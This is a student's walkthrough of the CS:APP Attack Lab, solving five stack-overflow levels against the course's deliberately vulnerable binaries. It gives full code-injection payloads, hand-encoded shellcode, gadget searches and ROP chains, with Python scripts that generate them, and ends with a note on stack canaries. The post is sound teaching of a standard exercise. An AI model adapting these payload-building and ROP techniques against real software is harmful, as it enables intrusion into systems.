CedricXu


CS student / photography enthusiast

[CSAPP] Attack Lab: Code Injection and ROP

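Introduction#

Corresponding sections: 3.10.3 & 3.10.4
Lab content: craft five different attacks against two programs that contain security vulnerabilities
Lab handout: http://csapp.cs.cmu.edu/3e/attacklab.pdf
What you will learn:

  • Different ways to attack a program through buffer overflow
  • How to write safer programs, and which features the operating system and compiler provide to make programs more secure
  • The stack and parameter-passing mechanisms of x86-64 programs
  • Debugging tools such as GDB and OBJDUMP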

Preface#

Our targets are CTARGET and RTARGET, two vulnerable executables. Both read a string from standard input through the function getbuf, defined as follows:

unsigned getbuf(){
	char buf[BUFFER_SIZE];
	Gets(buf);
	return 1;
}

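As we can see, the function allocates BUFFER_SIZE bytes on the stack. When the input string is longer than that, it overwrites stack memory beyond the buffer, such as the return address, and this is what makes the attack possible.
Lab overview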
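
To make the overflow concrete, here is a minimal Python sketch that models getbuf's frame as a byte array: 40 bytes of buf followed by the 8-byte saved return address. The 40-byte size comes from the getbuf disassembly shown in Level1, and 0x4017c0 is the touch1 address found there. The helper names, the placeholder return address, and the assumption that Gets appends a null terminator like the C library gets are illustrative, not taken from the lab source.

```python
import struct

BUF_SIZE = 0x28  # 40 bytes, from `sub $0x28,%rsp` in getbuf
ORIGINAL_RET = 0x1122334455667788  # made-up placeholder, not a real CTARGET address


def new_frame() -> bytearray:
    """Model the frame: buf[0..39] followed by the 8-byte saved return address."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<Q", ORIGINAL_RET))


def gets_into_frame(frame: bytearray, data: bytes) -> None:
    """Copy data plus a terminating null byte starting at buf[0], with no bounds check."""
    stored = data + b"\x00"
    frame[0:len(stored)] = stored


def saved_return_address(frame: bytearray) -> int:
    """Read the little-endian 8-byte value stored just above buf."""
    return struct.unpack_from("<Q", frame, BUF_SIZE)[0]


safe = new_frame()
gets_into_frame(safe, b"A" * 39)  # 39 bytes plus the null byte still fit in buf

smashed = new_frame()
gets_into_frame(smashed, b"A" * BUF_SIZE + struct.pack("<Q", 0x4017C0))

print(hex(saved_return_address(safe)))     # return address untouched
print(hex(saved_return_address(smashed)))  # return address replaced by the attacker
```

In this model a 39-byte input leaves the saved return address alone, while 40 bytes of padding followed by 8 more bytes replace it entirely.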

Part Ⅰ: Code Injection Attacks#

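In the first three phases we attack CTARGET with code injection. The stack location of this program is the same on every run, and data on the stack can be treated as executable code.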

Level1#

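Phase 1 does not require injecting any instructions; we only need to overwrite the return address to redirect the program.
In CTARGET, getbuf is called by the function test: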

void test() {
	int val;
	val = getbuf();
	printf("No exploit. Getbuf returned 0x%x\n", val);
}

Normally getbuf returns to test, which then prints the message. We want to change this behavior and execute touch1 instead:

void touch1() {
	vlevel = 1;
	printf("Touch1!: You called touch1()\n");
	validate(1);
	exit(0);
}

Let's look at the assembly code of getbuf:

00000000004017a8 <getbuf>:
  4017a8:	48 83 ec 28          	sub    $0x28,%rsp
  4017ac:	48 89 e7             	mov    %rsp,%rdi
  4017af:	e8 8c 02 00 00       	call   401a40 <Gets>
  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax
  4017b9:	48 83 c4 28          	add    $0x28,%rsp
  4017bd:	c3                   	ret    
  4017be:	90                   	nop
  4017bf:	90                   	nop

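The figure below shows the stack layout while getbuf runs. The function decreases the stack pointer by 0x28, allocating 40 bytes on the stack, and the character array buf sits at the top of the stack.
image.png
So we only need to supply 40 bytes of padding followed by the 8-byte target address, which overwrites the original return address. The disassembly gives the address of touch1: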

00000000004017c0 <touch1>

So our attack string is:

#phase1.txt

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c0 17 40 00 00 00 00 00
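
The same string can be generated rather than typed by hand. The sketch below packs the touch1 address in little-endian order after 40 padding bytes and prints it in the space-separated hex form that hex2raw reads. The helper name `hex2raw_text` is an illustrative assumption; any padding byte other than 0x0a (newline, which ends the input) should work.

```python
import struct

BUF_SIZE = 0x28    # bytes between buf[0] and the saved return address
TOUCH1 = 0x4017C0  # address of touch1 from the disassembly


def hex2raw_text(payload: bytes, per_line: int = 8) -> str:
    """Format bytes as space-separated hex pairs, eight per line."""
    lines = []
    for i in range(0, len(payload), per_line):
        chunk = payload[i:i + per_line]
        lines.append(" ".join(f"{b:02x}" for b in chunk))
    return "\n".join(lines)


# "<Q" packs an unsigned 64-bit value least significant byte first,
# which is how x86-64 stores the return address on the stack.
payload = b"\x00" * BUF_SIZE + struct.pack("<Q", TOUCH1)
phase1_text = hex2raw_text(payload)
print(phase1_text)
```

The last printed line is the overwritten return address, byte-reversed relative to how the address is written in the disassembly.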

The attack succeeds. Running with -q disables communication with the CMU server.

 ./hex2raw < ./phase1/phase1.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch1!: You called touch1()
Valid solution for level 1 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:1:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 17 40 00 00 00 00 00

Level2#

Phase 2 requires injecting a small amount of code as part of the attack string; the goal is to execute touch2:

void touch2(unsigned val) {
	vlevel = 2; /* Part of validation protocol */
	if (val == cookie) {
		printf("Touch2!: You called touch2(0x%.8x)\n", val);
		validate(2);
	} else {
		printf("Misfire: You called touch2(0x%.8x)\n", val);
		fail(2);
	}
	exit(0);
}

Compared with touch1, touch2 takes an unsigned argument val, which must equal cookie. The required value is stored in cookie.txt and is 0x59b997fa.
Assembly:

00000000004017ec <touch2>:
  4017ec:	48 83 ec 08          	sub    $0x8,%rsp
  4017f0:	89 fa                	mov    %edi,%edx
  4017f2:	c7 05 e0 2c 20 00 02 	movl   $0x2,0x202ce0(%rip)        # 6044dc <vlevel>
  4017f9:	00 00 00 
  4017fc:	3b 3d e2 2c 20 00    	cmp    0x202ce2(%rip),%edi        # 6044e4 <cookie>
  401802:	75 20                	jne    401824 <touch2+0x38>
  401804:	be e8 30 40 00       	mov    $0x4030e8,%esi
  401809:	bf 01 00 00 00       	mov    $0x1,%edi
  40180e:	b8 00 00 00 00       	mov    $0x0,%eax
  401813:	e8 d8 f5 ff ff       	call   400df0 <__printf_chk@plt>
  401818:	bf 02 00 00 00       	mov    $0x2,%edi
  40181d:	e8 6b 04 00 00       	call   401c8d <validate>
  401822:	eb 1e                	jmp    401842 <touch2+0x56>
  401824:	be 10 31 40 00       	mov    $0x403110,%esi
  401829:	bf 01 00 00 00       	mov    $0x1,%edi
  40182e:	b8 00 00 00 00       	mov    $0x0,%eax
  401833:	e8 b8 f5 ff ff       	call   400df0 <__printf_chk@plt>
  401838:	bf 02 00 00 00       	mov    $0x2,%edi
  40183d:	e8 0d 05 00 00       	call   401d4f <fail>
  401842:	bf 00 00 00 00       	mov    $0x0,%edi
  401847:	e8 f4 f5 ff ff       	call   400e40 <exit@plt>

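The argument compared against cookie is passed in %rdi, so the steps we need to perform are:

  • Store 0x59b997fa in %rdi
  • Call touch2

We can place the instructions for these two steps at the beginning of the attack string, then set bytes 41-48 of the attack string to the address A of the string itself, that is, the lowest address of the frame after getbuf subtracts 0x28 from %rsp. When getbuf returns, execution jumps to A and performs the two steps above. The stack after the attack string is loaded is shown below:
image.png
Now we obtain the actual value of A: using GDB, set a breakpoint right after getbuf moves the stack pointer and print the value of %rsp.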
❯ gdb ctarget
(gdb) b *0x4017af
(gdb) run -q
(gdb) p /x $rsp
$1 = 0x5561dc78

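Next we need the machine code for the attack steps. First write them in assembly:

movq $0x59b997fa, %rdi   # write the cookie into %rdi
pushq $0x4017ec          # push the address of touch2
ret                      # pop that address and jump to touch2

Then assemble with clang and disassemble with objdump:

❯ clang -c phase2.s && objdump -d phase2.o > phase2_dump.s

This produces the following: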

0000000000000000 <.text>:
   0: 48 c7 c7 fa 97 b9 59    mov    $0x59b997fa,%rdi
   7: 68 ec 17 40 00          push   $0x4017ec
   c: c3                      ret
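
As a cross-check on the objdump output, the three instructions can also be encoded by hand. The sketch below hard-codes the encodings visible in the listing above (48 c7 c7 plus a 32-bit immediate for the move into %rdi, 68 plus a 32-bit immediate for the push, c3 for ret). The function names are illustrative, and both immediates are assumed to be below 0x80000000 because the processor sign-extends them to 64 bits.

```python
import struct


def imm32(value: int) -> bytes:
    """Little-endian 32-bit immediate; rejects values that sign extension would change."""
    if not 0 <= value < 0x80000000:
        raise ValueError("immediate would be altered by sign extension")
    return struct.pack("<I", value)


def mov_imm_to_rdi(value: int) -> bytes:
    """movq $value, %rdi, encoded as 48 c7 c7 followed by imm32."""
    return b"\x48\xc7\xc7" + imm32(value)


def push_imm(value: int) -> bytes:
    """pushq $value, encoded as 68 followed by imm32."""
    return b"\x68" + imm32(value)


RET = b"\xc3"

COOKIE = 0x59B997FA
TOUCH2 = 0x4017EC
phase2_code = mov_imm_to_rdi(COOKIE) + push_imm(TOUCH2) + RET
print(phase2_code.hex())
```

The result is 13 bytes long, so it fits comfortably inside the 40-byte buffer.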

This gives us the attack string:

48 c7 c7 fa 97 b9 59 68
ec 17 40 00 c3 00 00 00    #   attack instructions
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00    #   address of the attack instructions, i.e. A

The attack succeeds:

❯ ./hex2raw < ./phase2/phase2.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00

Level3#

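Phase 3 is still a code injection attack. Compared with Phase 2, the cookie is now passed as a string instead of an unsigned number. The target function touch3 is shown below: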

/* Compare string to hex represention of unsigned value */
int hexmatch(unsigned val, char *sval) {
	char cbuf[110];
	/* Make position of check string unpredictable */
	char *s = cbuf + random() % 100;
	sprintf(s, "%.8x", val);
	return strncmp(sval, s, 9) == 0;
}

void touch3(char *sval) {
	vlevel = 3;     /* Part of validation protocol */
	if (hexmatch(cookie, sval)) {
		printf("Touch3!: You called touch3(\"%s\")\n", sval);
		validate(3);
	} else {
		printf("Misfire: You called touch3(\"%s\")\n", sval);
		fail(3);
	}
	exit(0);
}

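hexmatch checks whether the input string matches the hexadecimal representation of cookie. The overall approach is similar to Phase 2, with two points to watch:

  • The cookie is passed as a string, so it must be converted to its ASCII representation and stored on the stack
  • After getbuf returns and hexmatch is called, four pushes take place before strncmp runs, so the string must be stored where it will not be overwritten

The stack after the attack string is loaded looks like this:
image.png
Write the attack instructions in assembly:
movq $0x5561dca8, %rdi  # address of the cookie string (A+0x30)
pushq $0x4018fa         # address of touch3
ret

Assemble and disassemble to get the machine code: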

0000000000000000 <.text>:
   0: 48 c7 c7 a8 dc 61 55    mov    $0x5561dca8,%rdi
   7: 68 fa 18 40 00          push   $0x4018fa
   c: c3                      ret

Build the attack string:

48 c7 c7 a8 dc 61 55 68
fa 18 40 00 c3 00 00 00     #    attack instructions
00 00 00 00 00 00 00 00     <-|
00 00 00 00 00 00 00 00       |  these four lines will be overwritten
00 00 00 00 00 00 00 00       |  
78 dc 61 55 00 00 00 00     <-|- address of the attack instructions
35 39 62 39 39 37 66 61     #    ASCII codes of the cookie
00 00 00 00 00 00 00 00     #    \0
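
The address arithmetic and the ASCII conversion behind this string can be sketched as follows. The constants come from the GDB session and disassembly above; the variable names are illustrative. The cookie text is placed directly above the return-address slot, at A + 0x28 + 8 = A + 0x30, which keeps it outside the buffer region that later calls reuse.

```python
import struct

BUF_ADDR = 0x5561DC78  # A: %rsp inside getbuf, as printed by GDB
BUF_SIZE = 0x28
COOKIE = 0x59B997FA
TOUCH3 = 0x4018FA

# Eight lowercase hex digits plus a null terminator, matching sprintf("%.8x").
cookie_text = f"{COOKIE:08x}".encode("ascii") + b"\x00"

# First byte above the 8-byte return-address slot.
string_addr = BUF_ADDR + BUF_SIZE + 8

code = (
    b"\x48\xc7\xc7" + struct.pack("<I", string_addr)  # movq $string_addr, %rdi
    + b"\x68" + struct.pack("<I", TOUCH3)             # pushq $touch3
    + b"\xc3"                                         # ret
)

payload = (
    code.ljust(BUF_SIZE, b"\x00")   # injected code, padded to fill buf
    + struct.pack("<Q", BUF_ADDR)   # return address: jump to the start of buf
    + cookie_text                   # string that %rdi will point to
)

print(hex(string_addr))
print(payload.hex())
```

This payload is 57 bytes; the hand-written string above pads the terminator out to a full 8-byte line, which is equally valid.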

The attack succeeds:

❯ ./hex2raw < ./phase3/phase3.txt | ./ctarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target ctarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00 00 00 00 00 00 00 00

Part Ⅱ: Return-Oriented Programming#

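Code injection through buffer overflow is dangerous, so several techniques have been developed to defend against it. In the last two phases we attack RTARGET, which uses the following two techniques:

  • Stack randomization: the stack location changes on every run, so we can no longer know the stack address of the attack string, i.e. the A used above
  • Restricting executable regions: the memory holding the stack is marked non-executable, so even if we manage to jump to the attack string, execution fails with a segmentation fault

Fortunately, some clever people found a way around this: return-oriented programming (ROP).
image.png
The idea is to attack by stitching together pieces of the program's own code. Each piece is called a gadget; a gadget consists of a few instructions and ends with 0xc3 (the ret instruction).
Let's look at an example. This is a C code fragment from the RTARGET program: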
void setval_210(unsigned *p) {
	*p = 3347663060U;
}

and the corresponding assembly:

0000000000400f15 <setval_210>:
400f15: c7 07 d4 48 89 c7        movl $0xc78948d4,(%rdi)
400f1b: c3                       retq

The byte sequence 48 89 c7 inside it encodes movq %rax, %rdi, and c3 encodes ret. So if we jump to 0x400f18, this code behaves as:

movq %rax, %rdi
ret

This is a gadget. Once we know what the attack needs to do, we can look for suitable gadgets and chain them together to carry it out.
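
Finding a gadget comes down to searching a function's bytes for a wanted byte pattern and adding the match offset to the function's start address. A minimal sketch, using the setval_210 bytes from the listing above; the function name `find_gadgets` is an illustrative assumption:

```python
def find_gadgets(code: bytes, base: int, pattern: bytes) -> list:
    """Return the absolute address of every occurrence of pattern in code."""
    hits = []
    start = code.find(pattern)
    while start != -1:
        hits.append(base + start)
        start = code.find(pattern, start + 1)
    return hits


# Bytes of setval_210 as shown in the disassembly, starting at 0x400f15.
SETVAL_210 = bytes.fromhex("c7 07 d4 48 89 c7 c3")
MOVQ_RAX_RDI_RET = bytes.fromhex("48 89 c7 c3")  # movq %rax, %rdi ; ret

addresses = find_gadgets(SETVAL_210, 0x400F15, MOVQ_RAX_RDI_RET)
print([hex(a) for a in addresses])
```

The pattern starts three bytes into the function, which is where the address 0x400f18 comes from.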

Level2#

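Phase 4 uses ROP to accomplish the same task as Phase 2: passing the cookie value to touch2. We already broke this down into two steps:

  • Store 0x59b997fa in %rdi
  • Call touch2

The assignment also restricts us to the first eight registers (%rax through %rdi) and to instructions between start_farm and mid_farm as gadgets. After a careful search, the attack can be expressed with the following two gadgets:
popq %rax            (58)
movq %rax, %rdi      (48 89 c7)

Determine the address of each gadget: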

00000000004019ca <getval_280>:
  4019ca: b8 29 58 90 c3        mov    $0xc3905829,%eax
  4019cf: c3                    ret

00000000004019a0 <addval_273>:
  4019a0: 8d 87 48 89 c7 c3     lea    -0x3c3876b8(%rdi),%eax
  4019a6: c3                    ret

The addresses are 0x4019cc and 0x4019a2 respectively; the 90 encodes nop and can be ignored. So our attack string can be:

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00         # first 0x28 bytes
cc 19 40 00 00 00 00 00         # return address, points to popq %rax
fa 97 b9 59 00 00 00 00         # value to pop (the cookie)
a2 19 40 00 00 00 00 00         # points to movq %rax, %rdi
ec 17 40 00 00 00 00 00         # points to touch2
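
A ROP payload is just padding followed by a list of 8-byte little-endian words, where each word is either a gadget address or data for a pop. The sketch below rebuilds this string from the function start addresses in the listings plus the byte offset of each gadget inside its function; the variable names are illustrative.

```python
import struct

BUF_SIZE = 0x28
POP_RAX = 0x4019CA + 2      # bytes 58 90 c3 inside getval_280
MOV_RAX_RDI = 0x4019A0 + 2  # bytes 48 89 c7 c3 inside addval_273
COOKIE = 0x59B997FA
TOUCH2 = 0x4017EC

# Order matters: each ret pops the next word, and popq %rax consumes the cookie.
chain = [POP_RAX, COOKIE, MOV_RAX_RDI, TOUCH2]

payload = b"\x00" * BUF_SIZE + b"".join(struct.pack("<Q", word) for word in chain)

for i in range(0, len(payload), 8):
    print(" ".join(f"{b:02x}" for b in payload[i:i + 8]))
```

Since every entry is a code address or plain data, nothing on the stack ever needs to be executed, which is why the non-executable stack does not stop this attack.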

The attack succeeds:

❯ ./hex2raw < ./phase4/phase4.txt | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:rtarget:2:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CC 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 A2 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00

Level3#

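In Phase 5 we use ROP to solve the Phase 3 task, that is, passing the address of the cookie string to touch3. We therefore need the value of %rsp to compute where the string is stored. After mid_farm we notice a function that stands out: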

00000000004019d6 <add_xy>:
  4019d6: 48 8d 04 37           lea    (%rdi,%rsi,1),%rax
  4019da: c3                    ret

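It adds %rdi and %rsi and places the sum in %rax. So we can capture %rsp, load the offset between that value and the string, and add the two to compute the string's address. The steps are:

1. movq %rsp, %rdi
2. popq %rax                  # pop the offset stored on the stack
3. movq %rax, %rsi
4. lea (%rdi,%rsi,1), %rax    # add_xy
5. movq %rax, %rdi            # pass the result as the argument

No single gadget performs step 1, so we split it into two:

  • movq %rsp, %rax (48 89 e0)
  • movq %rax, %rdi (48 89 c7)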
0000000000401a03 <addval_190>:
  401a03: 8d 87 41 48 89 e0     lea    -0x1f76b7bf(%rdi),%eax
  401a09: c3                    ret

00000000004019a0 <addval_273>:
  4019a0: 8d 87 48 89 c7 c3     lea    -0x3c3876b8(%rdi),%eax
  4019a6: c3                    ret

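For step 2, popq %rax is encoded as 58, and we find:

00000000004019a7 <addval_219>:
  4019a7:	8d 87 51 73 58 90    	lea    -0x6fa78caf(%rdi),%eax
  4019ad:	c3                   	ret

No single gadget performs step 3 either, so it has to be split into three. The 32-bit moves are sufficient because the offset fits in 32 bits:

  • movl %eax, %edx (89 c2)
  • movl %edx, %ecx (89 d1)
  • movl %ecx, %esi (89 ce)

We find the following gadgets: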
00000000004019db <getval_481>:
  4019db: b8 5c 89 c2 90        mov    $0x90c2895c,%eax
  4019e0: c3                    ret
  
0000000000401a33 <getval_159>:
  401a33:	b8 89 d1 38 c9       	mov    $0xc938d189,%eax
  401a38:	c3                   	ret

0000000000401a11 <addval_436>:
  401a11: 8d 87 89 ce 90 90     lea    -0x6f6f3177(%rdi),%eax
  401a17: c3                    ret
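
The byte patterns searched for above follow a regular scheme: a register-to-register mov is opcode 89 followed by a ModRM byte built from the two register numbers, with a 48 prefix for the 64-bit form, and popq is 58 plus the register number. The sketch below reproduces the encodings used in this post. The helper names are illustrative, and the short names "ax", "cx" and so on stand for both the 32-bit and 64-bit registers as a simplification.

```python
# Register numbers 0..7 in the order used by the x86 instruction encoding.
REGS = ["ax", "cx", "dx", "bx", "sp", "bp", "si", "di"]


def mov_reg_reg(src: str, dst: str, wide: bool = False) -> bytes:
    """Encode mov src, dst (AT&T operand order); wide=True gives the movq form."""
    modrm = 0xC0 | (REGS.index(src) << 3) | REGS.index(dst)
    prefix = b"\x48" if wide else b""
    return prefix + bytes([0x89, modrm])


def pop_reg(dst: str) -> bytes:
    """Encode popq into one of the first eight registers."""
    return bytes([0x58 + REGS.index(dst)])


wanted = {
    "movq %rsp, %rax": mov_reg_reg("sp", "ax", wide=True),
    "movq %rax, %rdi": mov_reg_reg("ax", "di", wide=True),
    "popq %rax": pop_reg("ax"),
    "movl %eax, %edx": mov_reg_reg("ax", "dx"),
    "movl %edx, %ecx": mov_reg_reg("dx", "cx"),
    "movl %ecx, %esi": mov_reg_reg("cx", "si"),
}

for text, encoding in wanted.items():
    print(f"{text:18} {encoding.hex()}")
```

Generating the patterns this way makes it easy to enumerate every possible move and check which ones actually occur in the gadget farm.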

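Note that 38 c9 in getval_159 encodes cmpb %cl,%cl, which only sets condition flags and therefore acts like a nop here, so it can be ignored. Our attack string can then be: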

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00     # keep empty
06 1a 40 00 00 00 00 00     # movq %rsp, %rax
a2 19 40 00 00 00 00 00     # movq %rax, %rdi <-- position where %rsp is captured
ab 19 40 00 00 00 00 00     # popq %rax
48 00 00 00 00 00 00 00     # offset
dd 19 40 00 00 00 00 00     # movl %eax, %edx
34 1a 40 00 00 00 00 00     # movl %edx, %ecx
13 1a 40 00 00 00 00 00     # movl %ecx, %esi
d6 19 40 00 00 00 00 00     # add_xy
a2 19 40 00 00 00 00 00     # movq %rax, %rdi
fa 18 40 00 00 00 00 00     # touch3
35 39 62 39 39 37 66 61     # cookie string
00 00 00 00 00 00 00 00

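The cookie string sits 9 lines below the position where %rsp is captured, so the offset is 8*9=72=0x48. As in Phase 3, do not place the cookie in lines 2 through 5 of the attack string, or it will be overwritten. With that, the last problem is solved as well: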

❯ ./hex2raw < ./phase5/phase5.txt | ./rtarget -q
Cookie: 0x59b997fa
Type string:Touch3!: You called touch3("59b997fa")
Valid solution for level 3 with target rtarget
PASS: Would have posted the following:
        user id bovik
        course  15213-f15
        lab     attacklab
        result  1:PASS:0xffffffff:rtarget:3:00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 1A 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 AB 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 34 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 A2 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00 00 00 00 00 00 00 00
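
The 0x48 offset in the Phase 5 chain can be checked without running RTARGET by stepping through the chain in a toy model. The sketch below is not an x86 emulator: each gadget address is mapped to a hand-written Python effect, the stack base is a made-up address standing in for the randomized one, and only the registers used by the chain are tracked.

```python
import struct

BASE = 0x7FFD00001000  # made-up address of the first chain word (randomized in reality)
TOUCH3 = 0x4018FA

chain = [
    0x401A06,  # movq %rsp, %rax
    0x4019A2,  # movq %rax, %rdi
    0x4019AB,  # popq %rax
    0x48,      # offset consumed by the pop
    0x4019DD,  # movl %eax, %edx
    0x401A34,  # movl %edx, %ecx
    0x401A13,  # movl %ecx, %esi
    0x4019D6,  # add_xy: lea (%rdi,%rsi,1), %rax
    0x4019A2,  # movq %rax, %rdi
    TOUCH3,
]
memory = b"".join(struct.pack("<Q", w) for w in chain) + b"59b997fa\x00"


def run(chain_base: int) -> dict:
    """Follow the chain until control would reach touch3; return the registers."""
    regs = {"rax": 0, "rcx": 0, "rdx": 0, "rsi": 0, "rdi": 0, "rsp": chain_base}

    def pop() -> int:
        value = struct.unpack_from("<Q", memory, regs["rsp"] - BASE)[0]
        regs["rsp"] += 8
        return value

    def low32(value: int) -> int:
        return value & 0xFFFFFFFF  # movl zero-extends into the 64-bit register

    gadgets = {
        0x401A06: lambda: regs.update(rax=regs["rsp"]),
        0x4019A2: lambda: regs.update(rdi=regs["rax"]),
        0x4019AB: lambda: regs.update(rax=pop()),
        0x4019DD: lambda: regs.update(rdx=low32(regs["rax"])),
        0x401A34: lambda: regs.update(rcx=low32(regs["rdx"])),
        0x401A13: lambda: regs.update(rsi=low32(regs["rcx"])),
        0x4019D6: lambda: regs.update(rax=regs["rdi"] + regs["rsi"]),
    }
    while True:
        target = pop()  # each ret pops the next address
        if target == TOUCH3:
            return regs
        gadgets[target]()


final = run(BASE)
start = final["rdi"] - BASE
string_at_rdi = memory[start:start + 8]
print(hex(final["rdi"] - BASE), string_at_rdi)
```

In this model %rsp is captured while it points at the second chain word (BASE + 8), so adding 0x48 lands on BASE + 0x50, the first byte of the cookie string.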

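Afterword#

Since neither of the two techniques above (stack randomization and restricting executable regions) defends effectively against ROP, is there anything else we can do? There is: stack corruption detection. Stack corruption typically happens when a write runs past the bounds of a local buffer, so we can store a special canary value in the stack frame between any local buffer and the rest of the stack state. The value is generated randomly each time the program runs. Before the function returns, the program checks whether the canary has changed, and if it has, the program aborts.
Recent versions of GCC determine whether a function is vulnerable to stack overflow and insert this kind of check automatically; it costs very little performance yet works well.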
